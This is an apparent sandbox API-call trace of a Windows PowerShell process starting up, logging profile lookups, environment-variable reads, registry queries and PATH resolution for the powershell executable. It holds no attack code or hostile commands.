	[0640.454] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0640.454] SetErrorMode (uMode=0x1) returned 0x1
	[0640.454] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0640.454] SetErrorMode (uMode=0x1) returned 0x1
	[0640.454] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0640.454] SetErrorMode (uMode=0x1) returned 0x1
	[0640.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0640.455] SetErrorMode (uMode=0x1) returned 0x1
	[0640.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0640.455] SetErrorMode (uMode=0x1) returned 0x1
	[0640.455] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0640.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.456] CoTaskMemFree (pv=0x2a8ab0) 
	[0640.456] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0640.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.456] CoTaskMemFree (pv=0x2a8ab0) 
	[0640.456] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0640.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.456] CoTaskMemFree (pv=0x2a8ab0) 
	[0640.457] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0640.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.457] CoTaskMemFree (pv=0x2a8ab0) 
	[0643.466] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0643.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.466] CoTaskMemFree (pv=0x2a8ab0) 
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x304
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2e0
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0643.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0643.469] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0643.469] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0643.469] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0643.471] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0643.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.471] CoTaskMemFree (pv=0x2a8ab0) 
	[0643.475] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0643.475] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd780 | out: lpMode=0xcd780) returned 1
	[0643.477] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0643.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.477] CoTaskMemFree (pv=0x2a8ab0) 
	[0643.482] SetEvent (hEvent=0x300) returned 1
	[0643.482] SetEvent (hEvent=0x394) returned 1
	[0643.482] SetEvent (hEvent=0x32c) returned 1
	[0643.482] SetEvent (hEvent=0x2fc) returned 1
	[0643.482] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0643.488] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0643.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.490] CoTaskMemFree (pv=0x2a8ab0) 
	[0643.491] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4d8 | out: phkResult=0xcd4d8*=0x354) returned 0x0
	[0643.491] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd45c, lpData=0x0, lpcbData=0xcd458*=0x0 | out: lpType=0xcd45c*=0x0, lpData=0x0, lpcbData=0xcd458*=0x0) returned 0x2

Thread:
	id = 214
	os_tid = 0xc34


Thread:
	id = 234
	os_tid = 0xccc


Thread:
	id = 782
	os_tid = 0xa60


Thread:
	id = 788
	os_tid = 0x14e0


Thread:
	id = 897
	os_tid = 0x848


Thread:
	id = 931
	os_tid = 0x18f0


Thread:
	id = 932
	os_tid = 0x18f4

	[0505.377] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0575.972] LocalFree (hMem=0x207290) returned 0x0
	[0575.972] CloseHandle (hObject=0x2e0) returned 1
	[0575.972] CloseHandle (hObject=0x13) returned 1
	[0575.973] CloseHandle (hObject=0xf) returned 1
	[0575.973] RegCloseKey (hKey=0x304) returned 0x0
	[0575.974] RegCloseKey (hKey=0x300) returned 0x0
	[0575.974] RegCloseKey (hKey=0x2fc) returned 0x0
	[0575.974] LocalFree (hMem=0x2072e0) returned 0x0
	[0575.974] RegCloseKey (hKey=0x32c) returned 0x0
	[0596.598] RegCloseKey (hKey=0x2f0) returned 0x0
	[0607.076] RegCloseKey (hKey=0x2f0) returned 0x0
	[0624.329] RegCloseKey (hKey=0x390) returned 0x0
	[0624.329] RegCloseKey (hKey=0x38c) returned 0x0
	[0624.330] RegCloseKey (hKey=0x368) returned 0x0
	[0624.330] RegCloseKey (hKey=0x3a4) returned 0x0
	[0624.331] RegCloseKey (hKey=0x384) returned 0x0
	[0624.331] RegCloseKey (hKey=0x380) returned 0x0
	[0624.331] RegCloseKey (hKey=0x37c) returned 0x0
	[0624.332] RegCloseKey (hKey=0x378) returned 0x0
	[0624.332] RegCloseKey (hKey=0x374) returned 0x0
	[0624.333] RegCloseKey (hKey=0x370) returned 0x0
	[0624.333] RegCloseKey (hKey=0x36c) returned 0x0
	[0624.333] RegCloseKey (hKey=0x344) returned 0x0
	[0624.334] RegCloseKey (hKey=0x3a0) returned 0x0
	[0624.334] RegCloseKey (hKey=0x39c) returned 0x0
	[0624.334] RegCloseKey (hKey=0x364) returned 0x0
	[0624.334] RegCloseKey (hKey=0x360) returned 0x0
	[0624.335] RegCloseKey (hKey=0x35c) returned 0x0
	[0624.335] RegCloseKey (hKey=0x358) returned 0x0
	[0624.335] RegCloseKey (hKey=0x354) returned 0x0
	[0624.335] RegCloseKey (hKey=0x350) returned 0x0
	[0624.336] RegCloseKey (hKey=0x34c) returned 0x0
	[0624.336] RegCloseKey (hKey=0x348) returned 0x0
	[0624.336] RegCloseKey (hKey=0x398) returned 0x0
	[0624.336] RegCloseKey (hKey=0x338) returned 0x0
	[0624.337] RegCloseKey (hKey=0x334) returned 0x0
	[0624.337] RegCloseKey (hKey=0x330) returned 0x0
	[0624.337] RegCloseKey (hKey=0x2e0) returned 0x0
	[0624.337] RegCloseKey (hKey=0x304) returned 0x0
	[0624.338] RegCloseKey (hKey=0x300) returned 0x0
	[0624.338] RegCloseKey (hKey=0x2fc) returned 0x0
	[0624.338] RegCloseKey (hKey=0x32c) returned 0x0
	[0624.338] RegCloseKey (hKey=0x394) returned 0x0
	[0624.339] RegCloseKey (hKey=0x2f0) returned 0x0
	[0697.170] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 966
	os_tid = 0x19d8


Thread:
	id = 1273
	os_tid = 0x1cb4

	[0647.627] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0647.631] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0647.636] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.636] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.638] VirtualQuery (in: lpAddress=0x1c7ad960, lpBuffer=0x1c7ae820, dwLength=0x30 | out: lpBuffer=0x1c7ae820*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0647.641] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.642] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.645] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.645] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.648] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.648] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.665] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.665] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.667] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.667] CoTaskMemFree (pv=0x2a8ab0) 
	[0647.669] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0647.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0647.669] CoTaskMemFree (pv=0x2a8ab0) 
	[0649.628] VirtualQuery (in: lpAddress=0x1c7adc10, lpBuffer=0x1c7aead0, dwLength=0x30 | out: lpBuffer=0x1c7aead0*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0649.629] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0649.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.629] CoTaskMemFree (pv=0x2a8ab0) 
	[0649.632] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0649.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.632] CoTaskMemFree (pv=0x2a8ab0) 
	[0649.632] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0649.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.632] CoTaskMemFree (pv=0x2a8ab0) 
	[0649.634] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0649.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.634] CoTaskMemFree (pv=0x2a8ab0) 
	[0649.638] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0649.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.639] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.054] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.055] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.057] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.057] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.058] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.058] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.061] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.061] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.063] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.063] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.064] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.064] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.066] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.066] CoTaskMemFree (pv=0x2a8ab0) 
	[0653.087] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0653.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.087] CoTaskMemFree (pv=0x2a8ab0) 
	[0656.415] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0656.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0656.415] CoTaskMemFree (pv=0x2a8ab0) 
	[0656.418] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0656.418] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0656.418] CoTaskMemFree (pv=0x2a8ab0) 
	[0656.418] CoTaskMemAlloc (cb=0x128) returned 0x1b3ba980
	[0656.418] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b3ba980, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0656.418] CoTaskMemFree (pv=0x1b3ba980) 
	[0658.171] CoTaskMemAlloc (cb=0x20e) returned 0x1b3d36a0
	[0658.171] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b3d36a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0658.171] CoTaskMemFree (pv=0x1b3d36a0) 
	[0658.175] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0658.176] SetErrorMode (uMode=0x1) returned 0x1
	[0658.180] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0658.199] SetErrorMode (uMode=0x1) returned 0x1
	[0658.200] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0658.200] SetErrorMode (uMode=0x1) returned 0x1
	[0658.200] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0658.209] SetErrorMode (uMode=0x1) returned 0x1
	[0658.210] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0658.210] SetErrorMode (uMode=0x1) returned 0x1
	[0658.210] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0659.763] SetErrorMode (uMode=0x1) returned 0x1
	[0659.764] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0659.765] SetErrorMode (uMode=0x1) returned 0x1
	[0659.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0659.773] SetErrorMode (uMode=0x1) returned 0x1
	[0659.774] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0659.775] SetErrorMode (uMode=0x1) returned 0x1
	[0659.775] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0659.787] SetErrorMode (uMode=0x1) returned 0x1
	[0659.789] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0659.789] SetErrorMode (uMode=0x1) returned 0x1
	[0659.789] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0659.798] SetErrorMode (uMode=0x1) returned 0x1
	[0659.799] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0659.799] SetErrorMode (uMode=0x1) returned 0x1
	[0659.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0661.387] SetErrorMode (uMode=0x1) returned 0x1
	[0661.389] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0661.389] SetErrorMode (uMode=0x1) returned 0x1
	[0661.389] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0661.399] SetErrorMode (uMode=0x1) returned 0x1
	[0661.401] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0661.401] SetErrorMode (uMode=0x1) returned 0x1
	[0661.401] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0661.409] SetErrorMode (uMode=0x1) returned 0x1
